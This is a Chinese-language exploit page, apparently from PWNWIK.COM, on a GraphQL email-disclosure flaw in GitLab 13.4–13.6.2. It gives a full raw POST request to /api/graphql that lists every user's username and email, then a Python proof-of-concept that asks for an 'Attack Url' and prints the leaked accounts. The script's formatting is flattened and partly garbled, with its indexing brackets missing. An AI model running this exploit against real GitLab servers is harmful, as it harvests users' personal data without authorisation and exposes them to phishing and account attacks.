PWNWIK.COM
,
影响版本
GitLab 13.4 - 13.6.2
漏洞利用
请求URL:
http://xxx.xxx.xxx.xxx/-//graphql-explorer
Gitlab本身不允许获取账号邮箱信息,这里通过调用 Graphql 用户名查询造成了邮箱泄露漏洞
查看完报告后发现漏洞利用需要有账号用户名,在不知道的情况下无法获取邮箱,在Graphql官网查看得知可以通过另一个构造的语句一次性返回所有的用户名和邮箱
发包调用了/api/graphql
接口发送数据
完整数据包为:
POST /api/graphql HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 212 Content-Type: application/json {"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}
成功返回数据,造成 Gitlab的用户邮箱信息泄露。
POC
import requests import sys import random import re import json from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+--------------WgpSec--Team----------------') print('+ \03334mPOC_Des: http://wiki.peiqi.tech \0330m') print('+ \03334mVersion: GitLab 13.4 - 13.6.2 \0330m') print('+ \03336m使用格式: python3 poc.py \0330m') print('+ \03336mUrl >>> http://xxx.xxx.xxx.xxx \0330m') print('+------------------------------------------') def POC_1(target_url): vuln_url = target_url + "/api/graphql" user_number = 0 headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "Content-Type": "application/json", } try: data = """ {"query":"{\\nusers {\\nedges {\\n node {\\n username\\n email\\n avatarUrl\\n status {\\n emoji\\n message\\n messageHtml\\n }\\n }\\n }\\n }\\n }","variables":null,"operationName":null} """ requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, headers=headers, data=data ,verify=False, timeout=5) if "email" in response.text and "username" in response.text and "@" in response.text and response.status_code == 200: print('\03332mo 目标{}存在漏洞, 泄露用户邮箱数据....... \0330m'.format(target_url)) for i in range(0,999): try: username = json.loads(response.text)"data""users""edges"i"node""username" email = json.loads(response.text)"data""users""edges"i"node""email" user_number = user_number + 1 print('\03334mo 用户名:{} 邮箱:{} \0330m'.format(username, email)) except: print("\03332mo 共泄露{}名用户邮箱账号 \0330m".format(user_number)) sys.exit(0) else: print("\03331mx 不存在漏洞 \0330m") sys.exit(0) except Exception as e: print("\03331mx 请求失败 \0330m", e) if __name__ == '__main__': title() target_url = str(input("\03335mPlease input Attack Url\nUrl >>> \0330m")) POC_1(target_url)
PWNWIK.COM